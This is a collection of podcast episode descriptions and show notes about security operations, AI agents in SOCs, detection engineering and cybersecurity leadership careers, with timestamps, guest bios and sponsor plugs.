"The next five years are gonna be wild." That's the verdict from Forrester Principal Analyst Allie Mellen on the state of Security Operations. This episode dives into the "massive reset" that is transforming the SOC, driven by the rise of generative AI and a revolution in data management. Allie explains why the traditional L1, L2, L3 SOC model, long considered a "rite of passage" that leads to burnout, is being replaced by a more agile and effective Detection Engineering structure. As a self-proclaimed "AI skeptic," she cuts through the marketing hype to reveal what's real and what's not, arguing that while we are "not really at the point of agentic" AI, the real value lies in specialized triage and investigation agents.

Guest Socials: Allie's LinkedIn
Podcast Twitter: @CloudSecPod
If you want to watch videos of this LIVE STREAMED episode and past episodes, check out our other Cloud Security social channels: Cloud Security Podcast YouTube, Cloud Security Newsletter, Cloud Security BootCamp.
If you are interested in AI Cybersecurity, you can check out our sister podcast, AI Security Podcast.

Questions asked:
(00:00) Introduction
(02:35) Who is Allie Mellen?
(03:15) What is Security Operations in 2025? The SIEM & XDR Shakeup
(06:20) The Rise of Security Data Lakes & Data Pipeline Tools
(09:20) A "Great Reset" is Coming for the SOC
(10:30) Why the L1/L2/L3 Model is a Burnout Machine
(13:25) The Future is Detection Engineering: An "Infinite Loop of Improvement"
(17:10) Using AI Hallucinations as a Feature for New Detections
(18:30) AI in the SOC: Separating Hype from Reality
(22:30) What is "Agentic AI" (and Are We There Yet?)
(26:20) "No One Knows How to Secure AI": The Detection & Response Challenge
(28:10) The Critical Role of Observability Data for AI Security
(31:30) Are SOC Teams Actually Using AI Today?
(34:30) How to Build a SOC Team in the AI Era: Uplift & Upskill
(39:20) The 3 Things to Look for When Buying Security AI Tools
(41:40) Final Questions: Reading, Cooking, and Sushi

Resources: You can read Allie's blogs here.
Josh Liburdi, Principal Engineer of Security Operations at DoorDash, joins Maxime Lamothe-Brassard, LimaCharlie CEO / Founder, to talk about building the Strelka file scanning system.

As a security engineer who works in security operations (prevention, detection, and response), Josh has more than a decade of industry experience and has worked at several diverse organizations, including Brex, Target, and CrowdStrike. He also presents at information security conferences (BSides NYC & SF, SANS, fwd:cloudsec), is a published author (Bluenomicon from Splunk, Huntpedia from Sqrrl), and is active in the open source security community with contributions to many projects, including Substation at Brex (creator), Strelka at Target (creator), and the Zeek network analysis framework.

Join Defender Fridays, live every Friday, to discuss the dynamic world of information security in a collaborative space with seasoned professionals. Become part of the LimaCharlie Community. Learn more about LimaCharlie at limacharlie.io.
Most security professionals know what a CISO does. But what about a BISO? And why are Fortune 500 companies increasingly creating this executive role?

In this episode of The New CISO Podcast, host Steve Moore sits down with Evan Ferree, Staff Vice President and Business Information Security Officer at a Fortune 50 company, to decode one of cybersecurity's most misunderstood leadership positions.

What You'll Learn:

Understanding the BISO Role:
- What a Business Information Security Officer actually does (and how it differs from a Deputy CISO)
- When organizations need a BISO: the size, industry, and complexity indicators
- Why the BISO serves as a "force multiplier" for the security organization
- How to measure and defend BISO value during organizational change

The Career Journey:
- Evan's unconventional path from IT infrastructure to executive security leadership
- How a major cybersecurity breach became his "MBA in cybersecurity" in six months
- Why volunteering for uncomfortable work during a crisis creates career opportunities
- The progression from vulnerability analyst to SOC leadership to Staff VP

The 90% Influence Principle:
- Why the BISO role is about influence, not authority
- How to navigate multiple business units with different security needs
- Mastering the "why" behind security initiatives for non-technical audiences
- Building relationships and organizational awareness over time

Executive Skills That Matter:
- The "log lines" storytelling framework from Deloitte CISO Academy
- Developing executive presence through failure and self-awareness
- When to end a meeting and start over (and why that's okay)
- Speaking plain English vs. technical jargon with business leaders

Practical Career Advice:
- Transitioning from tactical security operations to strategic leadership roles
- Why getting uncomfortable is essential for growth
- Building business acumen alongside technical expertise
- Why Evan's best security hires came from outside cybersecurity

Key Insight: "You are 90% an influencer in this role. Unlike tactical security work where authority and urgency create credibility, the BISO must master explaining why security matters to the business, in terms the business understands."

Whether you're a security professional planning your path to executive leadership, a CISO considering adding a BISO function, or a business leader trying to understand how security enables business outcomes, this episode delivers actionable insights from someone who's lived the journey.

Guest: Evan Ferree, Staff Vice President & Business Information Security Officer at a Fortune 50 company, with 11 years of progressive security leadership experience spanning Security Operations, threat management, vulnerability management, and business information security.
Hosted by: Steve Moore | Produced in partnership with: Exabeam
Podcast: PrOTect It All
Episode: Bridging Military and Civilian Cybersecurity: Leadership, Skills, and Lifelong Learning with Christopher Ross
Pub date: 2025-09-15

In this episode, host Aaron Crow sits down with cybersecurity leader and National Guard threat hunt team lead Christopher Ross, diving into the real-world experiences that shape careers in the intersecting worlds of IT and OT security. Chris shares his 18-year journey from joining the military with a passion for computers to leading critical infrastructure cybersecurity efforts, both in uniform and in the private sector. Together, Aaron and Chris break down myths about gatekeeping, discuss the unique challenges of military versus civilian roles, and highlight lessons learned along the way. From imposter syndrome to servant leadership, the conversation unpacks how effective communication, continuous training, and the willingness to learn from failure fuel professional growth. Chris also reflects on how military training instills risk mitigation and teamwork, and how those skills can translate, and sometimes clash, with civilian cybersecurity cultures. They talk certifications, hands-on learning, the importance of meaningful tabletop exercises, and the evolving landscape as AI powers both attackers and defenders. Whether you're a veteran, a fresh analyst, or just passionate about cybersecurity, this honest and energetic exchange will leave you motivated to keep learning, keep growing, and keep protecting it all. So grab your energy drink and tune in for a conversation that proves everyone in cyber, no matter their path, has wisdom worth sharing.

Key Moments:
05:30 Military Adventures Surpass Civilian Opportunities
07:28 Military vs. Civilian Leadership Dynamics
10:42 Clarifying Civilian vs Military Missions
12:22 Leadership: Addressing Miscommunication & Misalignment
15:45 Toxic Leadership and Military Transition
20:01 Reliance on Tools vs. Core Skills
22:29 "Forgotten Skills Fade Over Time"
25:13 Boosting Confidence in New Roles
29:42 Interactive Training and Environmental Protection
32:37 Purple Teaming Strategy Insights
36:15 Persistence in Skill Development
39:04 Soft Skills Matter for Career Growth
42:44 "Technical & Business Acumen Fusion"
44:41 Military: Career Value and Benefits
48:09 "Cyber Education for K-12"

Resources Mentioned:
- https://www.ransomware.live/ : comprehensive resource that tracks and monitors ransomware groups and their activities.
- https://ransomwhe.re/ : tracks ransomware payments by collecting and analyzing cryptocurrency addresses associated with ransomware attacks.
- https://www.ransom-db.com/ : real-time ransomware tracking platform that collects, indexes, and centralizes information on ransomware groups and their victims.

About the Guest:
Christopher Ross is a veteran and cybersecurity leader with over 15 years of experience in Security Operations, Incident Response, and threat hunting across defense and fintech. A Chief Warrant Officer in the Army National Guard's Cyber Brigade, he has led blue and purple team operations, translating military discipline and teamwork into enterprise cyber defense strategies. In his civilian career, Christopher has built and led SOC teams, integrated MSSPs, and driven automation to strengthen detection and response capabilities at organizations including MACOM, CFGI, Draper, and Abiomed. He holds a Master of Science in Information Security Engineering from the SANS Technology Institute and more than a dozen GIAC certifications. An Order of Thor recipient from the Military Cyber Professionals Association, Christopher is passionate about developing playbooks, advancing training pipelines, and mentoring the next generation of defenders, sharing lessons from his veteran-to-cyber journey, practical insights on certification paths and ROI, and real-world stories from blue-team operations and purple-team collaboration.

Visit https://public.milcyber.org/ The Military Cyber Professionals Association is the only U.S. military professional association with cyber at its core. It connects, supports, and elevates those who serve in or support the military cyber domain, while investing in future generations through education and mentorship.

Connect with Christopher: https://www.linkedin.com/in/christopheraross-ma/

Connect With Aaron Crow:
Website: www.corvosec.com
LinkedIn: https://www.linkedin.com/in/aaronccrow

Learn more about PrOTect IT All:
Email: info@protectitall.co
Website: https://protectitall.co/
X: https://twitter.com/protectitall
YouTube: https://www.youtube.com/@PrOTectITAll
FaceBook: https://facebook.com/protectitallpodcast

To be a guest or suggest a guest/episode, please email us at info@protectitall.co

Please leave us a review on Apple/Spotify Podcasts:
Apple - https://podcasts.apple.com/us/podcast/protect-it-all/id1727211124
Spotify - https://open.spotify.com/show/1Vvi0euj3rE8xObK0yvYi4
I know that we're constantly talking about artificial intelligence: the best ways to use it, the ways hackers are using it, and the overall good, bad and ugly of implementing AI into your security infrastructure. But what if we took a slightly different route?

In this episode we're going to explore how AI can help make your people better at managing cybersecurity. We know there's a huge talent pool shortage, and the challenge of keeping employees vigilant against repeated attacks continues to grow.

So, watch/listen as I explore these dynamics, as well as many others, with Grant Oviatt, Head of Security Operations for Prophet Security, a company that recently unveiled their State of AI in SecOps 2025 research report. A lot of the data from the report was rather shocking, especially when the survey repeatedly uncovered how many SOCs, inundated with constant intrusion alerts, have experienced numerous breaches simply because the volume of critical alert notifications has made them easier to ignore.

It was a great conversation, with numerous takeaways, including:
- Why 60 percent of security teams have experienced critical breaches stemming from overlooked alerts.
- How security leaders anticipate AI solutions handling more tasks within the SOC over the next 3 years.
- Reasons for 57 percent of organizations deliberately suppressing detection rules and accepting higher risks to keep operations moving.
- How hackers are using AI beyond just phishing campaigns to get access to critical assets and networks.
- How the industrial sector can better implement AI without yielding to internal pressures.

As a go-to podcast for our listeners, we want to help you align your brand with our expertise. By sponsoring our podcast, your brand will build trust, and your message will stand out to an audience searching for tools to assist their cybersecurity efforts. Click Here to Become a Sponsor.

To catch up on past episodes, you can go to Manufacturing.net, IEN.com or MBTmag.com. You can also check Security Breach out wherever you get your podcasts, including Apple, Amazon and Overcast. If you have a cybersecurity story or topic that you'd like to have us explore on Security Breach, you can reach me at jeff@ien.com.
Credit unions have never seen a greater amount of fraud and other cybersecurity threats than they have in 2025. For this month's episode of the podcast, we're joined by Efrain Orsini, Jr., Director of Security Operations for SilverSky, a cybersecurity firm that has safeguarded a number of American credit unions for more than 20 years. "EJ", as he likes to be called, talks about several of those emerging threats and how artificial intelligence is putting a new spin on many of them. He also discusses the ways credit unions, both large and small, can protect themselves moving forward.
In this episode of Lock It Down with Security Magazine, Simon Morgan, Chief Product Officer at SureView Systems, discusses the evolution of security operations and the rise of artificial intelligence in modern SOCs.
Guest: Augusto Barros, Principal Product Manager, Prophet Security, ex-Gartner analyst

Topics:
- What is your definition of "AI SOC"? What will AI change in a SOC? What will the post-AI SOC look like?
- What are the primary mechanisms by which AI SOC tools reduce attacker dwell time, and what challenges do they face in maintaining signal fidelity?
- Why would this wave of SOC automation (namely, AI SOC) work now, if it did not fully succeed before (SOAR)?
- How do we measure progress towards AI SOC? What gets better at what time? How would we know? What SOC metrics will show improvement?
- What common misconceptions or challenges have organizations encountered during the initial stages of AI SOC adoption, and how can they be overcome?
- Do you have a timeline for SOC AI adoption? Sure, everybody wants AI alert triage, but what's next? What's after that?

Resources:
- "State of AI in Security Operations 2025" report
- LinkedIn SOAR vs AI SOC argument post
- Are AI SOC Solutions the Real Deal or Just Hype?
- EP236 Accelerated SIEM Journey: A SOC Leader's Playbook for Modernization and AI
- EP238 Google Lessons for Using AI Agents for Securing Our Enterprise
- EP223 AI Addressable, Not AI Solvable: Reflections from RSA 2025
- RSA 2025: AI's Promise vs. Security's Past — A Reality Check
- "Noise: A Flaw in Human Judgment" book
- "Security Chaos Engineering" book (and Kelly episode)
- A Brief Guide for Dealing with 'Humanless SOC' Idiots
How do you build and defend a network where attacks are not just expected, they're part of the curriculum? In this episode, Hazel talks with Jessica Oppenheimer, Director of Security Operations at Cisco, about the ten years she's spent in the Black Hat Network Operations Center (NOC).

Explore the technical challenges of segmenting and monitoring a network designed for experimentation, live hacking, and hands-on training, including how malicious and benign behaviors are distinguished in real time. Jessica shares how the NOC leverages Cisco technologies like the new machine learning-powered SnortML engine to detect zero-days, outliers, and advanced attack patterns that traditional rule sets miss.

Learn how automation, contextual analysis, and collaborative response drive decision-making in this high-stakes environment, and how those lessons now influence security at global events like the Olympics and the Super Bowl.

For more details, check out the Cisco blog wrap detailing all our Black Hat NOC activity: https://blogs.cisco.com/security/bhusa-2025-noc
Cybersecurity risks have become more complex and unpredictable than ever, yet many companies struggle to quantify these threats in terms that truly matter. How can CFOs and CISOs effectively communicate about risk, make smart security investments, and navigate the emerging challenges posed by AI? In this episode, CJ interviews Andy Ellis, a renowned cybersecurity leader, former CISO of Akamai, investor, director, advisor, leadership coach, and author of the book 1% Leadership. Andy unpacks why most companies measure risk the wrong way and breaks down his "Pyramid of Pain" framework for categorizing it. He discusses the dynamics between CFOs and CISOs in purchasing security tools, demystifies security budgeting and vendor negotiations, dives into the evolving role of AI in security operations, and explains why the CISO and CIO roles are on a collision course. Andy also reveals insider stories from the frontlines of major breaches, shares a compelling risk analogy inspired by vampires and zombies, and clears up once and for all why the demise of the Death Star was not a failure of risk management.

LINKS:
Andy Ellis on LinkedIn: https://www.linkedin.com/in/csoandy
Andy Ellis on X (@CSOAndy): https://x.com/csoandy
Website: https://www.csoandy.com
1% Leadership: https://www.amazon.com/1-Leadership-Master-Improvements-Leaders/dp/0306830817
How to CISO: https://www.howtociso.com
Duha One:
CJ on X (@cjgustafson222): https://x.com/cjgustafson222
Mostly metrics:

TIMESTAMPS:
(00:00) Preview and Intro
(02:49) Sponsor – Rillet | Pulley | Brex
(07:23) Defining Risk: Technical & Human-Friendly Perspectives
(09:20) Actuarial Risk Versus Human-Driven Risk
(15:33) Why the Demise of the Death Star Wasn't a Failure of Risk Management
(16:58) Sponsor – Aleph | RightRev | Navan
(21:22) How the Death Star Metaphor Relates to Real-World Security Breaches
(23:20) Why Risk Should Not Be Quantified in Dollar Terms
(25:15) The Pyramid of Pain: Risk Severity and Surprise Levels
(30:21) How CFOs and CISOs Should Partner on Security Purchases
(34:03) Are Security Budgets Over or Under-Spent?
(36:22) Balancing Budget for Security Tools and People
(39:48) Tips for FP&As on Brokering the Security Budget With Your CISO
(44:10) Factoring AI Uncertainty in a Three-Year Security Roadmap
(46:38) AI Washing in Security Products and Realistic Impact
(48:55) The Limitations of Security Operations
(50:53) The Future of CIO and CISO Roles and Organizational Reporting
(54:55) Why IT Shouldn't Report to the CFO
(57:18) Israeli Unit 8200 and Cybersecurity Innovation
(59:50) Startups Versus Public Companies: Differing Risk Models
(1:02:52) Wrap

SPONSORS:
Rillet is the AI-native ERP modern finance teams are switching to because it's faster, simpler, and 100% built for how teams operate today. See how fast your team can move. Book a demo at https://www.rillet.com/metrics.
Pulley is the cap table management platform built for CFOs and finance leaders who need reliable, audit-ready data and intuitive workflows, without the hidden fees or unreliable support. Switch in as little as 5 days and get 25% off your first year: https://pulley.com/mostlymetrics.
Brex offers the world's smartest corporate card on a full-stack global platform that is everything CFOs need to manage their finances on an elite level. Plus, they offer modern banking and treasury as well as intuitive expenses and accounting automation, bill pay, and travel. Find out more at https://www.brex.com/metrics
Aleph automates 90% of manual, error-prone busywork, so you can focus on the strategic work you were hired to do. Minimize busywork and maximize impact with the power of a web app, the flexibility of spreadsheets, and the magic of AI. Get a personalised demo at https://www.getaleph.com/run
RightRev automates the revenue recognition process from end to end, gives you real-time insights, and ensures ASC 606 / IFRS 15 compliance, all while closing books faster. For RevRec that auditors actually trust, visit https://www.rightrev.com and schedule a demo.
Navan is the all-in-one travel and expense solution that can give you access to exclusive, proprietary Nasdaq-validated data that reveals what's happening with corporate travel investments. See the Navan Business Travel Index at https://navan.com/bti.

#Cybersecurity #RiskManagement #CISO #SecurityOperations #SecurityFinance

This is a public episode. If you would like to discuss this with other subscribers or get access to bonus episodes, visit www.mostlymetrics.com
Matt Muller, Field CISO at Tines, knows all about revolutionizing security operations through strategic AI integration and intelligent automation. In his conversation with Jack, Matt explores how traditional SOC models create problematic feedback loops where junior analysts make critical decisions while senior practitioners handle escalations, limiting learning and growth opportunities. Instead, Matt envisions AI-assisted workflows where senior expertise gets encoded into intelligent systems that teach junior team members while they work, transforming security operations from reactive alert-chasing to proactive strategic defense. He also emphasizes communication skills, relationship building, and moving beyond being perceived as the "team of no" to become strategic enablers.

Topics discussed:
- Evolution from banning ChatGPT to strategic AI integration in security operations, emphasizing augmentation over replacement strategies.
- Model Context Protocol implementation challenges and the importance of safe-by-default approaches when integrating emerging AI technologies into production.
- Traditional SOC tier models create problematic feedback loops where junior analysts make critical decisions but lack learning opportunities.
- AI-assisted workflows can transform security operations by encoding senior expertise into systems that teach while automating routine tasks.
- Practical approaches to AI adoption including demystification techniques, validation methods, and breaking complex problems into manageable components.
- Strategic implementation of AI agents in security workflows, particularly for non-deterministic tasks like phishing investigation and alert triage.
- Importance of maintaining human oversight and guardrails when deploying AI systems in critical security operations and incident response.
- Communication skills and relationship building as fundamental competencies for security practitioners working with both AI systems and human stakeholders.
- Safe experimentation with AI technologies through controlled environments and understanding system limitations before production deployment.

Listen to more episodes: Apple | Spotify | YouTube | Website
Agentic AI is moving from hype to reality, reshaping how enterprises operate and how cyber defenders must adapt. In this CyberTalks episode, Mark Gillett (Chief Product Officer, eSentire) is joined by Ben Wilde (Head of Innovation, Georgian) to break down the risks, reliability challenges, and opportunities presented by autonomous AI agents.

In this episode, we explore:
- How AI agents expand the enterprise attack surface
- Why "agent security" may soon be its own discipline
- Guardrails security leaders need before adoption
- The balance between automation and human oversight in the SOC
- A practical crawl-walk-run model for implementing agentic AI

If you're a CISO, SOC architect, or IT leader, this episode will help you cut through the hype and prepare your team for the next frontier of AI-driven cybersecurity.

Have a question for us? Reach out: hello@esentire.com

About Cyber Talks
From ransomware attacks to supply chain compromises, eSentire's Cyber Talks podcast will delve into the world of the latest cyber threats that are impacting businesses globally. Join our team of security experts as we speak with C-level executives and security practitioners about the cyber risks affecting their business and how they're addressing these challenges.

About eSentire
eSentire, Inc., the Authority in Managed Detection and Response (MDR), protects the critical data and applications of 2000+ organizations in 80+ countries, across 35 industries from known and unknown cyber threats by providing Exposure Management, Managed Detection and Response and Incident Response services designed to build an organization's cyber resilience & prevent business disruption. Founded in 2001, eSentire protects the world's most targeted organizations with 65% of its global base recognized as critical infrastructure, vital to economic health and stability. By combining open XDR platform technology, 24/7 threat hunting, and proven security operations leadership, eSentire's award-winning MDR services and team of experts help organizations anticipate, withstand and recover from cyberattacks. For more information, visit www.esentire.com and follow @eSentire.
What if you were writing a book series about espionage and dangerous governments, and you had worked at the forefront of defending your country from all of these threats? Steinke has spent a lifetime in US national security roles, including twenty-eight years in the US Army and fourteen in the Department of Defense. His official duties have taken him from the US Military Academy at West Point to over thirty countries on the Eurasian landmass, including Afghanistan and Ukraine. Steinke holds master's degrees in West European studies and diplomacy from Indiana and Norwich Universities, respectively, as well as post-graduate certificates in national and international security affairs from Harvard and Stanford Universities. His passions include faith, family, fly fishing, and travel.

Rick's website: https://ricksteinke.com/
What does it take to run a world-class Security Operations Center (SOC) in today's high-stakes, high-speed cybersecurity landscape?

In this episode of the Endace Packet Forensic Files, Michael Morris chats with Jessica (Bair) Oppenheimer, Cisco's Director of Security Operations, for an in-depth look at next-generation Security Operations Centers (SOCs). Jessica shares her expertise from securing high-stakes events like the Paris 2024 Olympics, NFL Super Bowl, Black Hat, and RSAC Conference. Discover how her team leverages AI, full packet capture with EndaceProbes, and integrations with Cisco XDR and Splunk to combat AI-driven threats and ensure rapid detection and response. This episode is a must-listen for cybersecurity professionals who want to stay ahead of evolving threats. It is packed with insights on balancing automation with human expertise and key KPIs for SOC success.

ABOUT ENDACE
Endace (https://www.endace.com) is a world leader in high-performance packet capture solutions for cybersecurity, network and application performance. EndaceProbes are deployed on some of the world's largest, fastest and most critical networks. EndaceProbe models are available for on-premise, private cloud and public cloud deployments, delivering complete hybrid cloud visibility from a single pane of glass. Endace's open EndaceProbe Analytics appliances (https://www.endace.com/endaceprobe) can be deployed in on-premise locations and can also host third-party security and performance monitoring solutions while simultaneously recording a 100% accurate history of network activity.
Guest: Dominik Swierad, Senior PM D&R AI and Sec-Gemini

Topics:
- When introducing AI agents to security teams at Google, what was your initial strategy to build trust and overcome the natural skepticism? Can you walk us through the very first conversations and the key concerns that were raised?
- With a vast array of applications, how did you identify and prioritize the initial use cases for AI agents within Google's enterprise security? What specific criteria made a use case a good candidate for early evaluation? Were there any surprising 'no-go' areas you discovered?
- Beyond simple efficiency gains, what were the key metrics and qualitative feedback mechanisms you used to evaluate the success of the initial AI agent deployments?
- What were the most significant hurdles you faced in transitioning from successful pilots to broader adoption of AI agents?
- How do you manage the inherent risks of autonomous agents, such as potential for errors or adversarial manipulation, within a live and critical environment like Google's?
- How has the introduction of AI agents changed the day-to-day responsibilities and skill requirements for Google's security engineers?
- From your unique vantage point of deploying defensive AI agents, what are your biggest concerns about how threat actors will inevitably leverage similar technologies?

Resources:
- EP235 The Autonomous Frontier: Governing AI Agents from Code to Courtroom
- EP236 Accelerated SIEM Journey: A SOC Leader's Playbook for Modernization and AI
- EP224 Protecting the Learning Machines: From AI Agents to Provenance in MLSecOps
- EP227 AI-Native MDR: Betting on the Future of Security Operations?
- EP75 How We Scale Detection and Response at Google: Automation, Metrics, Toil
Kevin Nikkhoo joins the show to explore Security Operations Center as a Service (SOCaaS) and how it compares to traditional SOC models. He breaks down which organizations benefit most from this approach and how AI is reshaping modern SOC operations. Listeners will gain a clear understanding of how SOCaaS can enhance detection and response capabilities, and why embracing AI is key to the future of security operations.

Segment Resources:
https://www.xenexsoc.com/
https://www.xenexsoc.com/blog
https://www.xenexsoc.com/ebooks

This segment is sponsored by Tines. Tines' AI-enabled, secure workflow platform empowers your whole team regardless of their coding abilities, environment complexities, or tech stack. Learn more at https://cisostoriespodcast.com/tines

Visit https://cisostoriespodcast.com for all the latest episodes!
Show Notes: https://cisostoriespodcast.com/csp-215
The nature of Security Operations is changing. As cloud environments grow in complexity and data volumes explode, traditional approaches to detection and response are proving insufficient. This episode features an in-depth conversation with Kyle Polley, who leads the AI security team at Perplexity, about a modern blueprint for the Security Operations Center (SOC).

The discussion centers on a necessary architectural shift away from traditional SIEMs, which were not built for today's scale, toward a "data lake infrastructure built for detection and response". Kyle explains how this model provides the scalability needed to handle modern data loads and enables a more effective incident response process.

A cornerstone of this new model is the use of centralized AI agents. The conversation explores how these agents can be tasked with performing in-depth alert investigations, helping to reduce analyst burnout and allowing security teams to focus on more proactive, high-impact work. This approach moves beyond simple automation to create a system where AI augments and enhances the capabilities of the human team.

Guest Socials: Kyle's LinkedIn
Podcast Twitter: @CloudSecPod
If you want to watch videos of this LIVE STREAMED episode and past episodes, check out our other Cloud Security social channels: Cloud Security Podcast YouTube, Cloud Security Newsletter, Cloud Security BootCamp.
If you are interested in AI Cybersecurity, you can check out our sister podcast, AI Cybersecurity Podcast.

Questions asked:
(00:00) Introduction to Kyle Polley & The Future of SOCs
(01:03) The Core Argument: Why You Must Build Your SOC Before Compliance
(03:34) Beyond the Certificate: The Difference Between Being Compliant vs. Secure
(04:20) Today's #1 AI Threat: The Challenge of Prompt Injection
(06:00) The Architectural Flaw: Handling Untrusted Data in AI Systems
(08:20) The "Security Data Lake": Moving Beyond the Traditional SIEM
(15:00) The Future is Now: A Centralized AI Agent for Automated Investigations
(20:06) Will AI Take My Job? How AI Elevates, Not Replaces, the Security Analyst
(25:20) Redefining "Shifting Left" with Personal AI Security Agents
(31:00) Can AI Reason? How Modern AI Agents Intelligently Query Logs
(37:05) Rethinking Incident Response Playbooks in the Age of AI
(41:00) The MVP SOC: A Practical Roadmap for Small & Medium Companies
(46:08) Final Questions: Maintaining Optimism, Woodworking, and Tex-Mex
(50:08) Where to Connect with Kyle Polley

Resources spoken about during the episode:
- Easy Agents: an open-source framework
- How to give every department their own AI Agent
What does the integration of AI into a Security Operations Center (SOC) practically look like? This episode explores the concept of the "Agentic SOC," moving beyond marketing terms to discuss its real-world applications and limitations.

Ashish Rajan is joined by Edward Wu, CEO of Dropzone AI, for an in-depth discussion on the current state of artificial intelligence in cybersecurity. Edward, who holds numerous patents in the field, shares his perspective on how AI is changing security operations. The conversation details how AI agents can function as a tool to support human analysts rather than replace them, and why the idea of a fully autonomous SOC is not yet a reality.

The "Agentic SOC" model: A framework where AI agents assist human security engineers.
AI's role in alert investigation: How AI can autonomously investigate alerts by making over a hundred large language model invocations for a single alert.
Practical limitations of AI: A discussion on challenges like AI hallucinations and the need for organizational context.
Building vs. buying AI tools: An overview of the complexities involved in creating in-house AI agents for security.
The impact on SOC metrics: How AI can influence Mean Time To Resolution (MTTR) by investigating alerts in parallel within minutes.
The future for security professionals: How the role of a Level 1 SOC analyst is expected to evolve as AI handles more repetitive tasks.

Guest Socials - Edward's Linkedin Podcast Twitter - @CloudSecPod If you want to watch videos of this LIVE STREAMED episode and past episodes - Check out our other Cloud Security Social Channels:-Cloud Security Podcast- Youtube- Cloud Security Newsletter - Cloud Security BootCamp
If you are interested in AI Cybersecurity, you can check out our sister podcast - AI Cybersecurity Podcast

Questions asked: (00:00) Introduction: Why Agentic AI in the SOC Matters Now (03:03) Meet Edward Wu: 30 Patents and a Mission to Fix Alert Fatigue (04:03) What is an "Agentic SOC"? (AI Foot Soldiers & Human Generals) (06:27) Why SOAR & Playbooks Are Not Enough for Modern Threats (08:18) Reality vs. Hype: Can AI Create a Fully Autonomous SOC? (11:55) The New SOC Workflow: How AI Changes Daily Operations (14:10) Can You Build Your Own AI Agent? The Hidden Complexities (19:06) From Skepticism to Demand: The Evolution of AI in Security (22:00) Slashing MTTR: How AI Transforms Key SOC Metrics (28:42) Are AI-Powered Cyber Attacks Really on the Rise? (31:01) How Smart SOC Teams Use ChatGPT & Co-Pilots Today (32:38) The 4 Maturity Levels of Adopting AI in Your SOC (37:04) How to Build Trust in Your AI's Security Decisions (41:28) Beyond the SOC: Which Cybersecurity Jobs Will AI Disrupt Next? (46:44) What is the Future for Level 1 SOC Analysts? (49:11) Getting to Know Edward: Sim Racing & StarCraft Champion

Resources spoken about during the episode: Take a self-guided demo of Dropzone.ai; Request a Demo; Download a Copy of the Gartner Hype Cycle for Security Operations 2025. Thank you to our episode sponsor Dropzone.ai
ThreatLocker to Unveil Game-Changing Zero Trust Innovations at Black Hat 2025 | Visit Them at Booth #1933 | A ThreatLocker Pre-Event Coverage of Black Hat USA 2025 Las Vegas | Brand Story with John Lilliston

Join ITSP Magazine's Marco Ciappelli and Sean Martin as they preview ThreatLocker's exciting Black Hat 2025 presence with Detect Product Director John Lilliston. Discover upcoming major announcements, hands-on hacking demos, and how ThreatLocker's default deny approach is revolutionizing enterprise cybersecurity through comprehensive zero trust implementation.

As Black Hat USA 2025 approaches, cybersecurity professionals are gearing up for one of the industry's most anticipated events. ITSP Magazine's Marco Ciappelli and Sean Martin recently sat down with John Lilliston, ThreatLocker's Detect Product Director, to preview what promises to be an exciting showcase of zero trust innovation at booth 1933.

ThreatLocker has become synonymous with the "default deny" security approach, a philosophy that fundamentally changes how organizations protect their digital assets. Unlike traditional security models that allow by default and block known threats, ThreatLocker's approach denies everything by default and allows only approved applications, network communications, and storage operations. This comprehensive strategy operates across application, network, and storage levels, creating what Lilliston describes as a "hardened system that stops adversaries in their tracks."

The company's rapid growth reflects the industry's embrace of zero trust principles, moving beyond buzzword status to practical, enterprise-ready solutions. Lilliston, who joined ThreatLocker in February after evaluating their products from the enterprise side, emphasizes how the platform's learning mode and ring fencing capabilities set it apart from competitors in the application control space.

At Black Hat 2025, ThreatLocker will demonstrate their defense-in-depth strategy through their Detect product line. While their primary zero trust controls rarely fail, Detect provides crucial monitoring for applications that must run in enterprise environments but may have elevated risk profiles. The system can automatically orchestrate responses to threats, such as locking down browsers exhibiting irregular behavior that might indicate data exfiltration attempts.

Visitors to booth 1933 can expect hands-on demonstrations and on-demand hacking scenarios that showcase real-world applications of ThreatLocker's technology. The company is preparing major announcements that CEO Danny Houlihan will reveal during the event, promising game-changing developments for both the organization and its client base.

ThreatLocker's Black Hat agenda includes a welcome reception on Tuesday, August 5th, from 7-10 PM at the Mandalay Bay Complex, and Houlihan's presentation on "Simplifying Cybersecurity" on Thursday, August 7th, from 10:15-11:05 AM at Mandalay Bay J.

The convergence of practical zero trust implementation, cutting-edge threat detection, and automated response capabilities positions ThreatLocker as a key player in the evolving cybersecurity landscape, making their Black Hat presence essential viewing for security professionals seeking comprehensive protection strategies.

Keywords: Black Hat 2025, zero trust security, cybersecurity conference, ThreatLocker, default deny strategy, endpoint protection, application control, threat detection, enterprise security, network security, cybersecurity solutions, security automation, malware prevention, cyber threats, information security, security platform, Black Hat USA, cybersecurity innovation, managed detection response, security operations

Learn more about ThreatLocker: https://itspm.ag/threatlocker-r974

Note: This story contains promotional content.

Guests: John Lilliston, Cybersecurity Director | Threat Detection & Response | SOC Leadership | DFIR | EDR/XDR Strategy | GCFA, GISP | https://www.linkedin.com/in/john-lilliston-4725217b/

Hosts: Sean Martin, Co-Founder at ITSPmagazine | Website: https://www.seanmartin.com
Marco Ciappelli, Co-Founder at ITSPmagazine | Website: https://www.marcociappelli.com

Resources
Learn more and catch more stories from ThreatLocker: https://www.itspmagazine.com/directory/threatlocker
ThreatLocker® Welcome Reception | Don't gamble with your security! Join us at Black Hat for a lively Welcome Reception hosted by ThreatLocker®. Meet our Cyber Hero® Team and dive into discussions on the latest advancements in ThreatLocker® Endpoint Security. It's a great opportunity to connect and learn together! Time: 7PM - 10PM | Location: Mandalay Bay Complex
Learn more about ITSPmagazine Brand Story Podcasts: https://www.itspmagazine.com/purchase-programs
Newsletter Archive: https://www.linkedin.com/newsletters/tune-into-the-latest-podcasts-7109347022809309184/
Business Newsletter Signup: https://www.itspmagazine.com/itspmagazine-business-updates-sign-up
Are you interested in telling your story? https://www.itspmagazine.com/telling-your-story
As Black Hat USA 2025 approaches, the cybersecurity world is buzzing with innovation—and Dropzone AI is right at the center of it. With roots in Seattle and a mission to bring true intelligence into the security operations center (SOC), the Dropzone AI team is gearing up for a packed week in Las Vegas, from BSides to the AI Summit, and finally at Startup City (booth #6427).

Founded by Edward Wu, former Head of AI/ML at ExtraHop Networks, Dropzone AI was built on a key realization: the last thing SOCs need is another flood of alerts. Instead, they need help processing and acting on them. That's where Dropzone comes in—offering an AI-powered security analyst that doesn't just detect threats, but investigates, correlates, and takes action.

